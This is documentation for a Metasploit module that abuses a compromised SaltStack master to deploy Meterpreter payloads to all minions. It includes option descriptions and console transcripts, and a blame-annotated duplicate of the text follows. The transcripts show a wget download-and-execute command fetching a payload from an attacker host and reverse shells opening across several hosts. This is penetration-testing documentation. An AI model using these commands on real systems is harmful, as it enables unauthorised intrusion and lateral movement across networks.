documentation/modules/exploit/linux/local/saltstack_salt_minion_deployer.md

## Vulnerable Application

This exploit module uses saltstack salt to deploy a payload and run it
on all targets which have been selected (default all).
Currently only works against nix targets.

### Vulnerable Host

A vulnerable host install can be found in this [Docker environment](https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-11651/docker-compose.yml).

## Verification Steps

1. Install the application
1. Start msfconsole
1. Get an initial shell on the box
1. Do: `use exploit/linux/local/saltstack_salt_minion_deployer`
1. Do: `set session [#]`
1. Do: `run`
1. You should get sessions on all the targeted hosts

## Options

### SALT

Location of salt-master executable if not in a standard location. This is added to a list of default locations
which includes `/usr/bin/salt-master`, `/usr/local/bin/salt-master`. Defaults to ``

### MINIONS

Which minions to target. Defaults to `*`

### WritableDir

A directory on the compromised host we can write our payload to. Defaults to `/tmp`

### TargetWritableDir

A directory on the target hosts we can write and execute our payload to. Defaults to `/tmp`

### CALCULATE

This will calculate how many hosts may be exploitable by using Ansible's ping command.

### ListenerTimeout

How many seconds to wait after executing the payload for hosts to call back.
If set to `0`, wait forever. Defaults to `60`

## Scenarios

### Minion 3002.2 on Ubuntu 20.04

Get initial access to the system. In this case, root was required to execute salt commands successfully.

```
resource (salt_deploy.rb)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (salt_deploy.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (salt_deploy.rb)> set srvport 8181
srvport => 8181
resource (salt_deploy.rb)> set target 7
target => 7
resource (salt_deploy.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (salt_deploy.rb)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8181/hvy2Ol
[*] Server started.
[*] Run the following command on the target machine:
wget -qO exVJILEV --no-check-certificate http://1.1.1.1:8181/hvy2Ol; chmod +x exVJILEV; ./exVJILEV& disown
[*] 3.3.3.3    web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045380 bytes) to 3.3.3.3
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 3.3.3.3:45200) at 2023-12-16 09:59:02 -0500
```

```
resource (salt_deploy.rb)> use exploit/linux/local/saltstack_salt_minion_deployer
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
resource (salt_deploy.rb)> set session 1
session => 1
resource (salt_deploy.rb)> set verbose true
verbose => true
resource (salt_deploy.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (salt_deploy.rb)> set lport 9996
lport => 9996
[msf](Jobs:1 Agents:0) exploit(linux/local/saltstack_salt_minion_deployer) > 

[msf](Jobs:1 Agents:1) exploit(linux/local/saltstack_salt_minion_deployer) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/local/saltstack_salt_minion_deployer) > 
[*] Started reverse TCP handler on 1.1.1.1:9996 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] /tmp is writable, and salt-master executable found
[+] The target is vulnerable.
[*] Attempting to list minions
[*] minions:
- mac_minion
- salt-minion
- window-salt-minion
minions_denied: []
minions_pre: []
minions_rejected: []
[+] 3.3.3.3:45200 - minion file successfully retrieved and saved to /root/.msf4/loot/20231216100004_default_3.3.3.3_saltstack_minion_890818.yaml
[+] Minions List
============

 Status    Minion Name
 ------    -----------
 Accepted  mac_minion
 Accepted  salt-minion
 Accepted  window-salt-minion

[+] 3 minions were found accepted, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.
[*] Writing '/tmp/E76Azw' (336 bytes) ...
[*] Copying payload to minions

[*] Executing payloads
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:9996 -> 2.2.2.2:36850) at 2023-12-16 10:00:46 -0500
```
saltstack salt minion deployer 2023-12-16 10:13:46 -05:00			`## Vulnerable Application`

			`This exploit module uses saltstack salt to deploy a payload and run it`
			`on all targets which have been selected (default all).`
			`Currently only works against nix targets.`

saltstack review 2024-01-10 17:04:03 -05:00			`### Vulnerable Host`

			`A vulnerable host install can be found in this [Docker environment](https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-11651/docker-compose.yml).`

saltstack salt minion deployer 2023-12-16 10:13:46 -05:00			`## Verification Steps`

			`1. Install the application`
			`1. Start msfconsole`
			`1. Get an initial shell on the box`
			1. Do: `use exploit/linux/local/saltstack_salt_minion_deployer`
			1. Do: `set session [#]`
			1. Do: `run`
			`1. You should get sessions on all the targeted hosts`

			`## Options`

			`### SALT`

			`Location of salt-master executable if not in a standard location. This is added to a list of default locations`
saltstack review 2024-01-10 17:04:03 -05:00			which includes `/usr/bin/salt-master`, `/usr/local/bin/salt-master`. Defaults to ``
saltstack salt minion deployer 2023-12-16 10:13:46 -05:00
			`### MINIONS`

			Which minions to target. Defaults to `*`

saltstack review 2024-01-10 17:09:02 -05:00			`### WritableDir`
saltstack salt minion deployer 2023-12-16 10:13:46 -05:00
			A directory on the compromised host we can write our payload to. Defaults to `/tmp`

saltstack review 2024-01-10 17:09:02 -05:00			`### TargetWritableDir`
saltstack salt minion deployer 2023-12-16 10:13:46 -05:00
review comments 2023-12-23 12:18:06 -05:00			A directory on the target hosts we can write and execute our payload to. Defaults to `/tmp`
saltstack salt minion deployer 2023-12-16 10:13:46 -05:00
saltstack review 2024-01-10 17:09:02 -05:00			`### CALCULATE`
saltstack salt minion deployer 2023-12-16 10:13:46 -05:00
			`This will calculate how many hosts may be exploitable by using Ansible's ping command.`

			`### ListenerTimeout`

saltstack review 2024-01-10 17:09:02 -05:00			`How many seconds to wait after executing the payload for hosts to call back.`
			If set to `0`, wait forever. Defaults to `60`
saltstack salt minion deployer 2023-12-16 10:13:46 -05:00
			`## Scenarios`

			`### Minion 3002.2 on Ubuntu 20.04`

			`Get initial access to the system. In this case, root was required to execute salt commands successfully.`

			```
			`resource (salt_deploy.rb)> use exploit/multi/script/web_delivery`
			`[*] Using configured payload python/meterpreter/reverse_tcp`
			`resource (salt_deploy.rb)> set lhost 1.1.1.1`
			`lhost => 1.1.1.1`
			`resource (salt_deploy.rb)> set srvport 8181`
			`srvport => 8181`
			`resource (salt_deploy.rb)> set target 7`
			`target => 7`
			`resource (salt_deploy.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp`
			`payload => linux/x64/meterpreter/reverse_tcp`
			`resource (salt_deploy.rb)> run`
			`[*] Exploit running as background job 0.`
			`[*] Exploit completed, but no session was created.`
			`[*] Started reverse TCP handler on 1.1.1.1:4444`
			`[*] Using URL: http://1.1.1.1:8181/hvy2Ol`
			`[*] Server started.`
			`[*] Run the following command on the target machine:`
			`wget -qO exVJILEV --no-check-certificate http://1.1.1.1:8181/hvy2Ol; chmod +x exVJILEV; ./exVJILEV& disown`
			`[*] 3.3.3.3 web_delivery - Delivering Payload (250 bytes)`
			`[*] Sending stage (3045380 bytes) to 3.3.3.3`
			`[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 3.3.3.3:45200) at 2023-12-16 09:59:02 -0500`
			```

			```
			`resource (salt_deploy.rb)> use exploit/linux/local/saltstack_salt_minion_deployer`
			`[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp`
			`resource (salt_deploy.rb)> set session 1`
			`session => 1`
			`resource (salt_deploy.rb)> set verbose true`
			`verbose => true`
			`resource (salt_deploy.rb)> set lhost 1.1.1.1`
			`lhost => 1.1.1.1`
			`resource (salt_deploy.rb)> set lport 9996`
			`lport => 9996`
			`[msf](Jobs:1 Agents:0) exploit(linux/local/saltstack_salt_minion_deployer) >`

			`[msf](Jobs:1 Agents:1) exploit(linux/local/saltstack_salt_minion_deployer) > run`
			`[*] Exploit running as background job 1.`
			`[*] Exploit completed, but no session was created.`
			`[msf](Jobs:2 Agents:1) exploit(linux/local/saltstack_salt_minion_deployer) >`
			`[*] Started reverse TCP handler on 1.1.1.1:9996`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] /tmp is writable, and salt-master executable found`
			`[+] The target is vulnerable.`
			`[*] Attempting to list minions`
			`[*] minions:`
			`- mac_minion`
			`- salt-minion`
			`- window-salt-minion`
			`minions_denied: []`
			`minions_pre: []`
			`minions_rejected: []`
			`[+] 3.3.3.3:45200 - minion file successfully retrieved and saved to /root/.msf4/loot/20231216100004_default_3.3.3.3_saltstack_minion_890818.yaml`
			`[+] Minions List`
			`============`

			`Status Minion Name`
			`------ -----------`
			`Accepted mac_minion`
			`Accepted salt-minion`
			`Accepted window-salt-minion`

			`[+] 3 minions were found accepted, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.`
			`[*] Writing '/tmp/E76Azw' (336 bytes) ...`
			`[*] Copying payload to minions`

			`[*] Executing payloads`
			`[*] Transmitting intermediate stager...(126 bytes)`
			`[*] Sending stage (3045380 bytes) to 2.2.2.2`
			`[*] Meterpreter session 2 opened (1.1.1.1:9996 -> 2.2.2.2:36850) at 2023-12-16 10:00:46 -0500`
			```